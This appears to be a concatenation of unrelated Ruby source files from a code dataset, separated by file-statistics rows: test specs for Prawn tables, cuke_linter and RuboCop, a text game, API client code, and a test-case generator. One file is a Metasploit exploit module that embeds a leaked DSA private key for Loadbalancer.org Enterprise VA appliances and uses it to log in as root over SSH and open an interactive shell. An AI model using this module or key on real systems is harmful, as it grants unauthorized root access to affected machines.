cell.should.be.an.instance_of(Prawn::Table::Cell::Subtable)
cell.subtable.should.be.an.instance_of(Prawn::Table)
end
it "defaults its padding to zero" do
@table.cells[0, 0].padding.should == [0, 0, 0, 0]
end
it "has a subtable accessor" do
@table.cells[0, 0].subtable.should == @subtable
end
it "determines its dimensions from the subtable" do
@table.cells[0, 0].width.should == @subtable.width
@table.cells[0, 0].height.should == @subtable.height
end
end
describe "An invalid table" do
before(:each) do
@pdf = Prawn::Document.new
@bad_data = ["Single Nested Array"]
end
it "should raise error when invalid table data is given" do
assert_raises(Prawn::Errors::InvalidTableData) do
@pdf.table(@bad_data)
end
end
it "should raise an EmptyTableError with empty table data" do
lambda {
data = []
@pdf = Prawn::Document.new
@pdf.table(data)
}.should.raise( Prawn::Errors::EmptyTable )
end
it "should raise an EmptyTableError with nil table data" do
lambda {
data = nil
@pdf = Prawn::Document.new
@pdf.table(data)
}.should.raise( Prawn::Errors::EmptyTable )
end
end
end
describe "colspan / rowspan" do
before(:each) { create_pdf }
it "doesn't raise an error" do
lambda {
@pdf.table([[{:content => "foo", :colspan => 2, :rowspan => 2}]])
}.should.not.raise
end
it "colspan is properly counted" do
t = @pdf.make_table([[{:content => "foo", :colspan => 2}]])
t.column_length.should == 2
end
it "rowspan is properly counted" do
t = @pdf.make_table([[{:content => "foo", :rowspan => 2}]])
t.row_length.should == 2
end
it "raises if colspan or rowspan are called after layout" do
lambda {
@pdf.table([["foo"]]) { cells[0, 0].colspan = 2 }
}.should.raise(Prawn::Errors::InvalidTableSpan)
lambda {
@pdf.table([["foo"]]) { cells[0, 0].rowspan = 2 }
}.should.raise(Prawn::Errors::InvalidTableSpan)
end
it "raises when spans overlap" do
lambda {
@pdf.table([["foo", {:content => "bar", :rowspan => 2}],
[{:content => "baz", :colspan => 2}]])
}.should.raise(Prawn::Errors::InvalidTableSpan)
end
it "table and cell width account for colspan" do
t = @pdf.table([["a", {:content => "b", :colspan => 2}]],
:column_widths => [100, 100, 100])
spanned = t.cells[0, 1]
spanned.colspan.should == 2
t.width.should == 300
t.cells.min_width.should == 300
t.cells.max_width.should == 300
spanned.width.should == 200
end
it "table and cell height account for rowspan" do
t = @pdf.table([["a"], [{:content => "b", :rowspan => 2}]]) do
row(0..2).height = 100
end
spanned = t.cells[1, 0]
spanned.rowspan.should == 2
t.height.should == 300
spanned.height.should == 200
end
it "provides the full content_width as drawing space" do
w = @pdf.make_table([["foo"]]).cells[0, 0].content_width
t = @pdf.make_table([[{:content => "foo", :colspan => 2}]])
t.cells[0, 0].spanned_content_width.should == w
end
it "dummy cells are not drawn" do
# make a fake master cell for the dummy cell to slave to
t = @pdf.make_table([[{:content => "foo", :colspan => 2}]])
# drawing just a dummy cell should not ink
@pdf.expects(:stroke_line).never
@pdf.expects(:draw_text!).never
Prawn::Table::Cell.draw_cells([t.cells[0, 1]])
end
it "dummy cells do not add any height or width" do
t1 = @pdf.table([["foo"]])
t2 = @pdf.table([[{:content => "foo", :colspan => 2}]])
t2.width.should == t1.width
t3 = @pdf.table([[{:content => "foo", :rowspan => 2}]])
t3.height.should == t1.height
end
it "dummy cells ignored by #style" do
t = @pdf.table([[{:content => "blah", :colspan => 2}]],
:cell_style => { :size => 9 })
t.cells[0, 0].size.should == 9
end
it "splits natural width between cols in the group" do
t = @pdf.table([[{:content => "foo", :colspan => 2}]])
widths = t.column_widths
widths[0].should == widths[1]
end
it "splits natural width between cols when width is increased" do
t = @pdf.table([[{:content => "foo", :colspan => 2}]],
:width => @pdf.bounds.width)
widths = t.column_widths
widths[0].should == widths[1]
end
it "splits min-width between cols in the group" do
# Since column_widths, when reducing column widths, reduces proportional to
# the remaining width after each column's min width, we must ensure that the
# min-width is split proportionally in order to ensure the width is still
# split evenly when the width is reduced. (See "splits natural width between
# cols when width is reduced".)
t = @pdf.table([[{:content => "foo", :colspan => 2}]],
:width => 20)
t.column(0).min_width.should == t.column(1).min_width
end
it "splits natural width between cols when width is reduced" do
t = @pdf.table([[{:content => "foo", :colspan => 2}]],
:width => 20)
widths = t.column_widths
widths[0].should == widths[1]
end
it "splits natural_content_height between rows in the group" do
t = @pdf.table([[{:content => "foo", :rowspan => 2}]])
heights = t.row_heights
heights[0].should == heights[1]
end
it "skips column numbers that have been col-spanned" do
t = @pdf.table([["a", "b", {:content => "c", :colspan => 3}, "d"]])
t.cells[0, 0].content.should == "a"
t.cells[0, 1].content.should == "b"
t.cells[0, 2].content.should == "c"
t.cells[0, 3].should.be.kind_of(Prawn::Table::Cell::SpanDummy)
t.cells[0, 4].should.be.kind_of(Prawn::Table::Cell::SpanDummy)
t.cells[0, 5].content.should == "d"
end
it "skips row/col positions that have been row-spanned" do
t = @pdf.table([["a", {:content => "b", :colspan => 2, :rowspan => 2}, "c"],
["d", "e"],
["f", "g", "h", "i"]])
t.cells[0, 0].content.should == "a"
t.cells[0, 1].content.should == "b"
t.cells[0, 2].should.be.kind_of(Prawn::Table::Cell::SpanDummy)
t.cells[0, 3].content.should == "c"
t.cells[1, 0].content.should == "d"
t.cells[1, 1].should.be.kind_of(Prawn::Table::Cell::SpanDummy)
t.cells[1, 2].should.be.kind_of(Prawn::Table::Cell::SpanDummy)
t.cells[1, 3].content.should == "e"
t.cells[2, 0].content.should == "f"
t.cells[2, 1].content.should == "g"
t.cells[2, 2].content.should == "h"
t.cells[2, 3].content.should == "i"
end
end
| 33.060987 | 92 | 0.572997 |
396f88a742dbdf804fec363ba8e4646ed621243f | 4,260 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'net/ssh'
require 'net/ssh/command_stream'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::SSH
def initialize(info = {})
super(update_info(info, {
'Name' => 'Loadbalancer.org Enterprise VA SSH Private Key Exposure',
'Description' => %q{
Loadbalancer.org ships a public/private key pair on Enterprise virtual appliances
version 7.5.2 that allows passwordless authentication to any other LB Enterprise box.
Since the key is easily retrievable, an attacker can use it to gain unauthorized remote
access as root.
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => true,
'Targets' => [ [ "Universal", {} ] ],
'Payload' =>
{
'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find',
},
},
'Author' => 'xistence <xistence[at]0x90.nl>', # Discovery, Metasploit module
'License' => MSF_LICENSE,
'References' =>
[
['PACKETSTORM', '125754']
],
'DisclosureDate' => "Mar 17 2014",
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
'DefaultTarget' => 0
}))
register_options(
[
# Since we don't include Tcp, we have to register this manually
Opt::RHOST(),
Opt::RPORT(22)
], self.class
)
register_advanced_options(
[
OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
]
)
end
# helper methods that normally come from Tcp
def rhost
datastore['RHOST']
end
def rport
datastore['RPORT']
end
def do_login(user)
factory = ssh_socket_factory
opt_hash = {
:auth_methods => ['publickey'],
:port => rport,
:key_data => [ key_data ],
:use_agent => false,
:config => false,
:proxy => factory,
:non_interactive => true,
:verify_host_key => :never
}
opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
begin
ssh_socket = nil
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
ssh_socket = Net::SSH.start(rhost, user, opt_hash)
end
rescue Rex::ConnectionError
return nil
rescue Net::SSH::Disconnect, ::EOFError
print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
return nil
rescue ::Timeout::Error
print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
return nil
rescue Net::SSH::AuthenticationFailed
print_error "#{rhost}:#{rport} SSH - Failed authentication"
return nil
rescue Net::SSH::Exception => e
print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
return nil
end
if ssh_socket
# Create a new session from the socket, then dump it.
conn = Net::SSH::CommandStream.new(ssh_socket)
ssh_socket = nil
return conn
else
return nil
end
end
def exploit
conn = do_login("root")
if conn
print_good "#{rhost}:#{rport} - Successful login"
handler(conn.lsock)
end
end
def key_data
<<EOF
-----BEGIN DSA PRIVATE KEY-----
MIIBugIBAAKBgQCsCgcOw+DgNR/7g+IbXYdOEwSB3W0o3l1Ep1ibHHvAtLb6AdNW
Gq47/UxY/rX3g2FVrVCtQwNSZMqkrqALQwDScxeCOiLMndCj61t3RxU3IOl5c/Hd
yhGh6JGPdzTpgf8VhJIZnvG+0NFNomYntqYFm0y11dBQPpYbJE7Tx1t/lQIVANHJ
rJSVVkpcTB4XdtR7TfO317xVAoGABDytZN2OhKwGyJfenZ1Ap2Y7lkO8V8tOtqX+
t0LkViOi2ErHJt39aRJJ1lDRa/3q0NNqZH4tnj/bh5dUyNapflJiV94N3637LCzW
cFlwFtJvD22Nx2UrPn+YXrzN7mt9qZyg5m0NlqbyjcsnCh4vNYUiNeMTHHW5SaJY
TeYmPP8CgYAjEe5+0m/TlBtVkqQbUit+s/g+eB+PFQ+raaQdL1uztW3etntXAPH1
MjxsAC/vthWYSTYXORkDFMhrO5ssE2rfg9io0NDyTIZt+VRQMGdi++dH8ptU+ldl
2ZejLFdTJFwFgcfXz+iQ1mx6h9TPX1crE1KoMAVOj3yKVfKpLB1EkAIUCsG3dIJH
SzmJVCWFyVuuANR2Bnc=
-----END DSA PRIVATE KEY-----
EOF
end
end
| 29.583333 | 102 | 0.639671 |
f79cc701e1796bd3702d440c6785f24802faa2e4 | 8,829 | require_relative '../../../../../environments/rspec_env'
RSpec.describe CukeLinter::FeatureWithTooManyDifferentTagsLinter do
let(:model_file_path) { 'some_file_path' }
it_should_behave_like 'a linter at the unit level'
it_should_behave_like 'a configurable linter at the unit level'
it 'has a name' do
expect(subject.name).to eq('FeatureWithTooManyDifferentTagsLinter')
end
describe 'linting' do
context 'with a feature that contains too many different tags' do
let(:test_model) do
model = generate_feature_model(parent_file_path: model_file_path)
model.tags = [CukeModeler::Tag.new('@1'),
CukeModeler::Tag.new('@2'),
CukeModeler::Tag.new('@3'),
CukeModeler::Tag.new('@4'),
CukeModeler::Tag.new('@5'),
CukeModeler::Tag.new('@6'),
CukeModeler::Tag.new('@7'),
CukeModeler::Tag.new('@8'),
CukeModeler::Tag.new('@9'),
CukeModeler::Tag.new('@10'),
CukeModeler::Tag.new('@11')]
model
end
it_should_behave_like 'a linter linting a bad model'
it 'records a problem' do
result = subject.lint(test_model)
expect(result[:problem]).to match(/^Feature contains too many different tags. \d+ tags found \(max 10\)\.$/)
end
it 'includes the number of different tags found in the problem record' do
unique_tag_count = test_model.tags.count
result = subject.lint(test_model)
expect(result[:problem])
.to eq("Feature contains too many different tags. #{unique_tag_count} tags found (max 10).")
test_model.tags << CukeModeler::Tag.new('@had_better_be_unique')
result = subject.lint(test_model)
expect(result[:problem])
.to eq("Feature contains too many different tags. #{unique_tag_count + 1} tags found (max 10).")
end
it 'only counts unique tags' do
model = generate_feature_model
model.tags = []
100.times { model.tags << CukeModeler::Tag.new('@A') }
result = subject.lint(model)
expect(result).to eq(nil)
end
context 'with child models' do
let(:test_model) do
model = generate_feature_model
model.tags = [CukeModeler::Tag.new('@1'),
CukeModeler::Tag.new('@2'),
CukeModeler::Tag.new('@3'),
CukeModeler::Tag.new('@4'),
CukeModeler::Tag.new('@5'),
CukeModeler::Tag.new('@6'),
CukeModeler::Tag.new('@7'),
CukeModeler::Tag.new('@8'),
CukeModeler::Tag.new('@9'),
CukeModeler::Tag.new('@10'),
CukeModeler::Tag.new('@11')]
# Not all model types are a test but the models dont care and it's good enough for the test
model.tests = [child_model]
model
end
# Descriptive variable name, just in case what kinds of elements are taggable ever changes
taggable_elements = %w[feature scenario outline example]
taggable_elements.each do |model_type|
context 'that have tags' do
let(:child_model) do
model = send("generate_#{model_type}_model")
model.tags = [CukeModeler::Tag.new('@12'),
CukeModeler::Tag.new('@13'),
CukeModeler::Tag.new('@14')]
model
end
it "considers tags from a #{model_type}" do
result = subject.lint(test_model)
expect(result[:problem]).to eq('Feature contains too many different tags. 14 tags found (max 10).')
end
end
context 'that do not have tags' do
context 'because their tags are empty' do
let(:child_model) do
model = send("generate_#{model_type}_model")
model.tags = []
model
end
it 'can handle the child model without problem' do
expect { subject.lint(test_model) }.to_not raise_error
end
end
end
end
end
end
context 'with a feature that does not contain too many different tags' do
context 'because it contains 10 different tags' do
let(:test_model) do
model = generate_feature_model
model.tags = [CukeModeler::Tag.new('@1'),
CukeModeler::Tag.new('@2'),
CukeModeler::Tag.new('@3'),
CukeModeler::Tag.new('@4'),
CukeModeler::Tag.new('@5'),
CukeModeler::Tag.new('@6'),
CukeModeler::Tag.new('@7'),
CukeModeler::Tag.new('@8'),
CukeModeler::Tag.new('@9'),
CukeModeler::Tag.new('@10')]
model
end
it_should_behave_like 'a linter linting a good model'
end
context 'because it contains fewer than 10 different tags' do
let(:test_model) do
model = generate_feature_model
model.tags = [CukeModeler::Tag.new('@1')]
model
end
it_should_behave_like 'a linter linting a good model'
end
context 'because it contains no tags' do
context 'because its tags are empty' do
let(:test_model) do
model = generate_feature_model
model.tags = []
model
end
it_should_behave_like 'a linter linting a good model'
end
context 'because its tags are nil' do
# NOTE: Not handling the case of the model's tags being nil because the model methods used in the
# linter's implementation will themselves not work when the tags are nil.
end
end
end
describe 'configuration' do
let(:default_tag_threshold) { 10 }
describe 'tag threshold configuration' do
context 'with no configuration' do
context 'because configuration never happened' do
let(:unconfigured_test_model) do
model = generate_feature_model
model.tags = []
(default_tag_threshold + 1).times { |count| model.tags << CukeModeler::Tag.new("@#{count}") }
model
end
it 'defaults to a tag threshold of 10 tags' do
result = subject.lint(unconfigured_test_model)
expected_count = unconfigured_test_model.tags.count
expect(result[:problem])
.to eq("Feature contains too many different tags. #{expected_count} tags found (max 10).")
end
end
context 'because configuration did not set a tag threshold' do
let(:configuration) { {} }
let(:test_model) do
model = generate_feature_model
model.tags = []
(default_tag_threshold + 1).times { |count| model.tags << CukeModeler::Tag.new("@#{count}") }
model
end
before(:each) do
subject.configure(configuration)
end
it 'defaults to a tag threshold of 10 tags' do
result = subject.lint(test_model)
expect(result[:problem])
.to eq("Feature contains too many different tags. #{test_model.tags.count} tags found (max 10).")
end
end
end
context 'with configuration' do
let(:tag_threshold) { 3 }
let(:configuration) { { 'TagCountThreshold' => tag_threshold } }
before(:each) do
subject.configure(configuration)
end
let(:test_model) do
model = generate_feature_model
model.tags = []
(tag_threshold + 1).times { |count| model.tags << CukeModeler::Tag.new("@#{count}") }
model
end
it 'the tag threshold used is the configured value' do
result = subject.lint(test_model)
expected_count = test_model.tags.count
expect(result[:problem])
.to eq("Feature contains too many different tags. #{expected_count} tags found (max #{tag_threshold}).")
end
end
end
end
context 'a non-feature model' do
let(:test_model) { CukeModeler::Model.new }
it_should_behave_like 'a linter linting a good model'
end
end
end
| 29.332226 | 118 | 0.539132 |
26518c953f3c4537c8286674d19d9dc045fd98d8 | 241 | # frozen_string_literal: true
RSpec.describe User do
subject(:user) { build(:user) }
it { is_expected.to have_many :projects }
it { is_expected.to validate_presence_of :email }
it { is_expected.to validate_presence_of :name }
end
| 21.909091 | 51 | 0.738589 |
ed6552fbc4a296451be8ea799bc60e4633778daf | 2,142 | require 'io/console'
require './Game'
player = Player.new
game = Game.new player
player.currentSector = game.sectors[0]
# set name
while player.nameSet == false && game.running == false
printf "What is your name?\n"
player.name = gets.chomp
printf "\nYour name is %s, is this right? [y/n]\n", player.name
if STDIN.getch == 'y' then
player.nameSet = true
game.running = true
printf "\nWelcome %s!\n", player.name
end
printf "\n"
end
while game.running
input = gets.chomp.split
# Exit/Quit
if input[0] == "exit" || input[0] == "quit" then
game.exit
end
# Inventory
if input[0] == "i" || input[0] == "inv" || input[0] == "inventory" then
player.showInventory
end
# Map
if input[0] == "m" || input[0] == "map" then
game.showMap
end
# Doors
if input[0] == "doors" then
game.showDoorsFor player.currentSector
end
# Goto
if input[0] == "goto" then
player.goto input[1], game.sectors
end
# Build
if input[0] == "build" then
if input[1] == "item" then
if input[2] && input[3] then
printf "\nName can't contain white spaces!\n\n"
elsif input[2] && input[2].delete(' ') != "" then
item = Item.new input[2]
printf "\nYou created an item called %s\n\n", item.name
player.addItemToInventory item
printf "\n%s added to your inventory\n\n", item.name
else
printf "\nbuild item <name>\n\n"
end
elsif input[1] == "sector" then
printf "\nYou created a sector\n\n"
else
printf "\nbuild <item|sector> <name>\n\n"
end
end
# Take
if input[0] == "take" then
player.take input[1]
end
# Where am I
if input[0] == "wai" || input[0] == "whereami" then
printf "\nYou are in sector %s\n\n", player.currentSector.name
end
# Drop
if input[0] == "drop" then
player.drop input[1]
end
# Give
if input[0] == "give" then
player.give input[1]
end
# Destroy
if input[0] == "destroy" then
player.destroy input[1]
end
# Objects
if input[0] == "o" || input[0] == "objs" || input[0] == "objects" then
game.showObjectsIn player.currentSector
end
# Save
if input[0] == "save" then
player.save
end
# Help
if input[0] == "help" then
end
end
| 19.651376 | 72 | 0.630719 |
33f664cbafccc81837a600e52a113a7007106ba3 | 237 | require_relative '../../../lib/bitfinex.rb'
client = Bitfinex::RESTv2.new({
:url => ENV['REST_URL'],
:proxy => ENV['PROXY'],
:api_key => ENV['API_KEY'],
:api_secret => ENV['API_SECRET']
})
puts client.ticker('tBTCUSD', 'fUSD')
| 21.545455 | 43 | 0.616034 |
3364e31e3403e1741b5131de602c8e37794c215b | 235 | class Survey::ResponseSerializer < ActiveModel::Serializer
attributes :id, :lock_version, :survey_submission_id,
:survey_question_id,
:response, :fuuid
# TODO: test that response comes back ok as JSON
end
| 33.571429 | 58 | 0.702128 |
034ce9167b77ac2aea9fc8db9b8d71a6578a7a5f | 3,630 | # frozen_string_literal: true
require 'yaml'
require 'erb'
# data files
TOKEN_SEQ_FILE_LIST = [
'stdacl_token_seq.yml',
'extacl_token_seq.yml'
# 'extacl_objgrp_token_seq.yml'
].freeze
# return spec conf dir
def _spec_conf_dir(file)
specdir = Dir.new('./spec/conf/')
File.join(specdir.path, file)
end
# return spec data dir
def _spec_data_dir(file)
datadir = Dir.new('./spec/data/')
File.join(datadir.path, file)
end
def gen_testcase(tokens, fields)
if fields.empty?
[{ data: '', msg: '', valid: true }]
else
field = fields.shift
field_patterns = tokens[field.intern]
# generate testpatterns recursively.
leftover_results = gen_testcase(tokens, fields)
create_data(field_patterns, leftover_results)
end
end
def create_data(field_patterns, leftover_results)
field_patterns.each_with_object([]) do |each, curr_results|
leftover_results.each do |each_res|
## do not add pattern that has multiple 'false'
## add single fault pattern.
next unless each[:valid] || each_res[:valid]
curr_results.push(single_data(each, each_res))
end
curr_results
end
end
def single_data(curr, leftover)
{
data: [curr[:data], leftover[:data]].join(' '),
# used only single fail case,
# (1) curr AND leftover are VALID case
# (2) one of curr OR leftover is FALSE case
msg: curr[:msg] || leftover[:msg],
valid: curr[:valid] && leftover[:valid]
}
end
def each_test
TOKEN_SEQ_FILE_LIST.each do |each_file|
token_seq_data = YAML.load_file(_spec_conf_dir(each_file))
token_seq_data.each do |each|
puts "Test Name: #{each[:testname]}"
puts "Test Case File: #{each[:casedata]}"
yield(each)
end
end
end
##############################
# generate test case data file
puts '## generate test case data file'
each_test do |each|
# read tokens pattern data
tokens = YAML.load_file(_spec_conf_dir(each[:casedata]))
# generate test case data
testcase_list = gen_testcase(tokens, each[:fieldseq])
# write datafile
case_file_base = [each[:testname], '.yml'].join
puts "Test Case Data: #{case_file_base}"
case_file = _spec_data_dir(case_file_base)
File.open(case_file, 'w') do |file|
file.puts YAML.dump(testcase_list.flatten)
end
end
##############################
# run test per test case file
code_data = DATA.read
puts '## generate spec code'
each_test do |each|
spec_file_base = "#{each[:testname]}.rb"
puts "Spec code Data: #{spec_file_base}"
File.open(_spec_data_dir(spec_file_base), 'w') do |file|
code_erb = ERB.new(code_data, nil, '-')
file.puts code_erb.result(binding)
end
end
__END__
# -*- coding: utf-8 -*-
require 'spec_helper'
require 'stringio'
describe 'Parser' do
describe '#parse_string' do
before do
@parser = CiscoAclIntp::Parser.new(color: false, silent: true)
end
<%-
tests = YAML.load_file(_spec_data_dir(each[:testname] + '.yml'))
test_total = tests.length
test_curr = 1
tests.each do |t|
now = sprintf(
"%d/%.1f\%", test_curr, (100.0 * test_curr / test_total)
)
if t[:valid]
-%>
it 'should be parsed acl [<%= now %>]: <%= t[:data] %>' do
datastr = '<%= t[:data] %>'
@parser.parse_string(datastr)
expect(@parser.contains_error?).to be_falsey
end
<%-
else
-%>
it 'should not be parsed acl [<%= now %>]: <%= t[:data] %>' do
datastr = StringIO.new('<%= t[:data] %>', 'r')
@parser.parse_file(datastr)
expect(@parser.contains_error?).to be_truthy
end
<%-
end
test_curr = test_curr + 1
end
-%>
end # describe parse_file
end # describe Parser
| 24.693878 | 68 | 0.654821 |
ed327938c5d2c984523a1a3674abdf91b1398c8e | 90 | json.extract! @survey, :id, :name, :company_id, :section, :text, :created_at, :updated_at
| 45 | 89 | 0.711111 |
18c9082affa1af9e995c6dfa19ad57339878d150 | 7,564 | =begin
#Datadog API V2 Collection
#Collection of all Datadog Public endpoints.
The version of the OpenAPI document: 1.0
Contact: [email protected]
Generated by: https://openapi-generator.tech
Unless explicitly stated otherwise all files in this repository are licensed under the Apache-2.0 License.
This product includes software developed at Datadog (https://www.datadoghq.com/).
Copyright 2020-Present Datadog, Inc.
=end
require 'date'
require 'time'
module DatadogAPIClient::V2
# Object containing the definition of a metric's ingested and indexed volume.
class MetricIngestedIndexedVolumeAttributes
# whether the object has unparsed attributes
attr_accessor :_unparsed
# Indexed volume for the given metric.
attr_accessor :indexed_volume
# Ingested volume for the given metric.
attr_accessor :ingested_volume
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'indexed_volume' => :'indexed_volume',
:'ingested_volume' => :'ingested_volume'
}
end
# Returns all the JSON keys this model knows about
def self.acceptable_attributes
attribute_map.values
end
# Attribute type mapping.
def self.openapi_types
{
:'indexed_volume' => :'Integer',
:'ingested_volume' => :'Integer'
}
end
# List of attributes with nullable: true
def self.openapi_nullable
Set.new([
])
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
if (!attributes.is_a?(Hash))
fail ArgumentError, "The input argument (attributes) must be a hash in `DatadogAPIClient::V2::MetricIngestedIndexedVolumeAttributes` initialize method"
end
# check to see if the attribute exists and convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h|
if (!self.class.attribute_map.key?(k.to_sym))
fail ArgumentError, "`#{k}` is not a valid attribute in `DatadogAPIClient::V2::MetricIngestedIndexedVolumeAttributes`. Please check the name to make sure it's valid. List of attributes: " + self.class.attribute_map.keys.inspect
end
h[k.to_sym] = v
}
if attributes.key?(:'indexed_volume')
self.indexed_volume = attributes[:'indexed_volume']
end
if attributes.key?(:'ingested_volume')
self.ingested_volume = attributes[:'ingested_volume']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
indexed_volume == o.indexed_volume &&
ingested_volume == o.ingested_volume
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Integer] Hash code
def hash
[indexed_volume, ingested_volume].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def self.build_from_hash(attributes)
new.build_from_hash(attributes)
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.openapi_types.each_pair do |key, type|
if attributes[self.class.attribute_map[key]].nil? && self.class.openapi_nullable.include?(key)
self.send("#{key}=", nil)
elsif type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :Time
Time.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :Boolean
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when :Array
# generic array, return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
# models (e.g. Pet) or oneOf
klass = DatadogAPIClient::V2.const_get(type)
res = klass.respond_to?(:openapi_one_of) ? klass.build(value) : klass.build_from_hash(value)
if res.instance_of? DatadogAPIClient::V2::UnparsedObject
self._unparsed = true
end
res
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
if value.nil?
is_nullable = self.class.openapi_nullable.include?(attr)
next if !is_nullable || (is_nullable && !instance_variable_defined?(:"@#{attr}"))
end
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 31 | 237 | 0.640534 |
618ea5be1f191ae9f8a5dd0b7a5a5c602765454d | 9,270 | # frozen_string_literal: true
RSpec.describe RuboCop::Cop::Generator do
subject(:generator) do
described_class.new(cop_identifier, 'your_id', output: stdout)
end
HOME_DIR = Dir.pwd
let(:stdout) { StringIO.new }
let(:cop_identifier) { 'Style/FakeCop' }
before do
allow(File).to receive(:write)
end
describe '#write_source' do
include_context 'cli spec behavior'
it 'generates a helpful source file with the name filled in' do
generated_source = <<~RUBY
# frozen_string_literal: true
# TODO: when finished, run `rake generate_cops_documentation` to update the docs
module RuboCop
module Cop
module Style
# TODO: Write cop description and example of bad / good code. For every
# `SupportedStyle` and unique configuration, there needs to be examples.
# Examples must have valid Ruby syntax. Do not use upticks.
#
# @example EnforcedStyle: bar (default)
# # Description of the `bar` style.
#
# # bad
# bad_bar_method
#
# # bad
# bad_bar_method(args)
#
# # good
# good_bar_method
#
# # good
# good_bar_method(args)
#
# @example EnforcedStyle: foo
# # Description of the `foo` style.
#
# # bad
# bad_foo_method
#
# # bad
# bad_foo_method(args)
#
# # good
# good_foo_method
#
# # good
# good_foo_method(args)
#
class FakeCop < Cop
# TODO: Implement the cop in here.
#
# In many cases, you can use a node matcher for matching node pattern.
# See https://github.com/rubocop-hq/rubocop/blob/master/lib/rubocop/node_pattern.rb
#
# For example
MSG = 'Use `#good_method` instead of `#bad_method`.'
def_node_matcher :bad_method?, <<~PATTERN
(send nil? :bad_method ...)
PATTERN
def on_send(node)
return unless bad_method?(node)
add_offense(node)
end
end
end
end
end
RUBY
expect(File)
.to receive(:write)
.with('lib/rubocop/cop/style/fake_cop.rb', generated_source)
generator.write_source
expect(stdout.string)
.to eq("[create] lib/rubocop/cop/style/fake_cop.rb\n")
end
it 'refuses to overwrite existing files' do
new_cop = described_class.new('Layout/Tab', 'your_id')
allow(new_cop).to receive(:exit!)
expect { new_cop.write_source }
.to output(
"rake new_cop: lib/rubocop/cop/layout/tab.rb already exists!\n"
).to_stderr
end
end
describe '#write_spec' do
include_context 'cli spec behavior'
it 'generates a helpful starting spec file with the class filled in' do
generated_source = <<~SPEC
# frozen_string_literal: true
RSpec.describe RuboCop::Cop::Style::FakeCop do
subject(:cop) { described_class.new(config) }
let(:config) { RuboCop::Config.new }
# TODO: Write test code
#
# For example
it 'registers an offense when using `#bad_method`' do
expect_offense(<<~RUBY)
bad_method
^^^^^^^^^^ Use `#good_method` instead of `#bad_method`.
RUBY
end
it 'does not register an offense when using `#good_method`' do
expect_no_offenses(<<~RUBY)
good_method
RUBY
end
end
SPEC
expect(File)
.to receive(:write)
.with('spec/rubocop/cop/style/fake_cop_spec.rb', generated_source)
generator.write_spec
end
it 'refuses to overwrite existing files' do
new_cop = described_class.new('Layout/Tab', 'your_id')
allow(new_cop).to receive(:exit!)
expect { new_cop.write_spec }
.to output(
"rake new_cop: spec/rubocop/cop/layout/tab_spec.rb already exists!\n"
).to_stderr
end
end
describe '#todo' do
it 'provides a checklist for implementing the cop' do
expect(generator.todo).to eql(<<~TODO)
Do 3 steps:
1. Add an entry to the "New features" section in CHANGELOG.md,
e.g. "Add new `Style/FakeCop` cop. ([@your_id][])"
2. Modify the description of Style/FakeCop in config/default.yml
3. Implement your new cop in the generated file!
TODO
end
end
describe '.new' do
